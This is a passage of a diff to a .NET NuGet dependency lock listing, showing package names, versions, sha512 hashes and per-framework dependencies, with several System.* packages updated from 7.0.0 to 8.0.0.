"net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Collections.Immutable", "id": "System.Collections.Immutable", "version": "8.0.0", "sha512": "sha512-BXqVkcIrhimvvem6q2ChWkuW6XYYirvb6FlhvuwaMoBqBdpcr4nehJBKP65Tw40UqcUM6oDoODsecM0yjZ6AUw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], 
"netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition", "id": "System.Composition", "version": "8.0.0", "sha512": "sha512-/AZ/S+sX6awiSeSvOv7997aiwbU6HCcOBJDLecdYQJjDo+4nYCrWwWKQQIZ38VZ6BLh1pDmcYFPZockIuoRIYw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net462": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net47": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net471": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net472": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net48": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net6.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", 
"System.Composition.Runtime", "System.Composition.TypedParts"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", 
"System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition.AttributedModel", "id": "System.Composition.AttributedModel", "version": "8.0.0", "sha512": "sha512-gmEwpwXz+COPtuAASK+ichAg8+0oQAaPOV59g6fDdnt1KWbrymdixAn06bNbkdCUGcBXb8RX5k79cqg0Hqlv1g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition.Convention", "id": "System.Composition.Convention", "version": "8.0.0", "sha512": "sha512-MP7qMadQGUcMOEyGON5dmy9T+OXubvIx04kFHvTVPfZ/9+ns8dqmFToxoF7IDzJVSWmtOQHDUP2fL1x8F6slTA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel"], "net462": ["System.Composition.AttributedModel"], "net47": ["System.Composition.AttributedModel"], "net471": ["System.Composition.AttributedModel"], "net472": ["System.Composition.AttributedModel"], "net48": ["System.Composition.AttributedModel"], "net5.0": ["System.Composition.AttributedModel"], "net6.0": ["System.Composition.AttributedModel"], "net7.0": 
["System.Composition.AttributedModel"], "net8.0": ["System.Composition.AttributedModel"], "net9.0": ["System.Composition.AttributedModel"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel"], "netcoreapp2.1": ["System.Composition.AttributedModel"], "netcoreapp2.2": ["System.Composition.AttributedModel"], "netcoreapp3.0": ["System.Composition.AttributedModel"], "netcoreapp3.1": ["System.Composition.AttributedModel"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel"], "netstandard2.1": ["System.Composition.AttributedModel"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition.Hosting", "id": "System.Composition.Hosting", "version": "8.0.0", "sha512": "sha512-HK6mWN38TLXo0jQOzR6so8cH1J8/6MzCfSsQS15bWbFEYKeonKRAZKyTC2E92o+wB1KCkocNpOy01ix61JnWjQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.Runtime"], "net462": ["System.Composition.Runtime"], "net47": ["System.Composition.Runtime"], "net471": ["System.Composition.Runtime"], "net472": ["System.Composition.Runtime"], "net48": ["System.Composition.Runtime"], "net5.0": ["System.Composition.Runtime"], "net6.0": ["System.Composition.Runtime"], "net7.0": ["System.Composition.Runtime"], "net8.0": ["System.Composition.Runtime"], "net9.0": ["System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.Runtime"], "netstandard": [], 
"netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.Runtime"], "netstandard2.1": ["System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition.Runtime", "id": "System.Composition.Runtime", "version": "8.0.0", "sha512": "sha512-hgGA3KDIx9FN3WYkpMvy0pUqWAul9BTehmqq49dqPxu5E+MbUKqgksU5XRP8M9LoBPZFa8FqBbKeFgCZ3rja2w==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition.TypedParts", "id": "System.Composition.TypedParts", "version": "8.0.0", "sha512": "sha512-rKu0GdZ4JYOWUF7br1W7UQFI/UgzWTU03CHY6tnTLZXCMth6YSADGJRRQYrLzpwh2+NuNcBIuv7a7x8J1xsfdw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net462": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net47": ["System.Composition.AttributedModel", "System.Composition.Hosting", 
"System.Composition.Runtime"], "net471": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net472": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net48": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net6.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": 
[]}, - {"name": "System.Configuration.ConfigurationManager", "id": "System.Configuration.ConfigurationManager", "version": "7.0.0", "sha512": "sha512-g3iVgTpIcjMYpH+sMq5VKjytevOJv+ABsYLKOLj0UZrXp3diFFdnPPqL+orxMD5ktyaTagg2S7ONJInu8itIaQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "net462": ["System.Security.Permissions"], "net47": ["System.Security.Permissions"], "net471": ["System.Security.Permissions"], "net472": ["System.Security.Permissions"], "net48": ["System.Security.Permissions"], "net5.0": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "net6.0": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "net7.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "net8.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "net9.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netcoreapp2.1": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netcoreapp2.2": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netcoreapp3.0": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netcoreapp3.1": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": 
["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netstandard2.1": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Diagnostics.EventLog", "id": "System.Diagnostics.EventLog", "version": "7.0.0", "sha512": "sha512-m/H4Rg7KukGEmfRpl+rXU1UbMN3GYbv42cbMHRgMwHIiUL3svKoFFR76Fk/mHN5TgrwGx64fS0Fp+p3qICKg/Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Security.Principal.Windows"], "net462": ["System.Security.Principal.Windows"], "net47": ["System.Security.Principal.Windows"], "net471": ["System.Security.Principal.Windows"], "net472": ["System.Security.Principal.Windows"], "net48": ["System.Security.Principal.Windows"], "net5.0": ["System.Security.Principal.Windows"], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Security.Principal.Windows"], "netcoreapp2.1": ["System.Security.Principal.Windows"], "netcoreapp2.2": ["System.Security.Principal.Windows"], "netcoreapp3.0": ["System.Security.Principal.Windows"], "netcoreapp3.1": ["System.Security.Principal.Windows"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Security.Principal.Windows"], "netstandard2.1": ["System.Security.Principal.Windows"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Drawing.Common", "id": "System.Drawing.Common", "version": "7.0.0", "sha512": "sha512-0TJd5U26gRDgGa/rqABgHC5OBAiyl7Mm3pIzPgKfpmPXFQ8CFVWyGi+4mkEaCK715ViOBDkU2pC2nAiPunLw7Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], 
"net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": ["Microsoft.Win32.SystemEvents"], "net7.0": ["Microsoft.Win32.SystemEvents"], "net8.0": ["Microsoft.Win32.SystemEvents"], "net9.0": ["Microsoft.Win32.SystemEvents"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Configuration.ConfigurationManager", "id": "System.Configuration.ConfigurationManager", "version": "8.0.0", "sha512": "sha512-WLn7WxNMGs8+pboojHpid8CJiNhcr2j7kA0gmI8fgU5LF0JGKGqHhSSHc8WW0h77svQSS29KO+hr+xKeuS2J9A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Security.Cryptography.ProtectedData"], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Security.Cryptography.ProtectedData"], "net6.0": ["System.Security.Cryptography.ProtectedData"], "net7.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "net8.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "net9.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.1": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.2": ["System.Security.Cryptography.ProtectedData"], "netcoreapp3.0": 
["System.Security.Cryptography.ProtectedData"], "netcoreapp3.1": ["System.Security.Cryptography.ProtectedData"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Security.Cryptography.ProtectedData"], "netstandard2.1": ["System.Security.Cryptography.ProtectedData"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Diagnostics.EventLog", "id": "System.Diagnostics.EventLog", "version": "8.0.0", "sha512": "sha512-um5/JzI6kqUKdoRX4qtIrMql36C6GQgspx2ntHO3HNO23QNuRC4Qn8Fe+7TCZ4gamEQJeuTt3Dy4hxUsjJURpQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO", "id": "System.IO", "version": "4.3.0", "sha512": "sha512-v8paIePhmGuXZbE9xvvNb4uJ5ME4OFXR1+8la/G/L1GIl2nbU2WFnddgb79kVK3U2us7q1aZT/uY/R0D/ovB5g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", 
"System.Text.Encoding", "System.Threading.Tasks"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.2": 
["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO.FileSystem", "id": "System.IO.FileSystem", "version": "4.3.0", "sha512": "sha512-T7WB1vhblSmgkaDpdGM3Uqo55Qsr5sip5eyowrwiXOoHBkzOx3ePd9+Zh97r9NzOwFCxqX7awO6RBxQuao7n7g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": ["System.IO.FileSystem.Primitives"], "net461": ["System.IO.FileSystem.Primitives"], "net462": ["System.IO.FileSystem.Primitives"], "net47": ["System.IO.FileSystem.Primitives"], "net471": ["System.IO.FileSystem.Primitives"], "net472": ["System.IO.FileSystem.Primitives"], "net48": ["System.IO.FileSystem.Primitives"], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], 
"net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.0": 
["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO.FileSystem.Primitives", "id": "System.IO.FileSystem.Primitives", "version": 
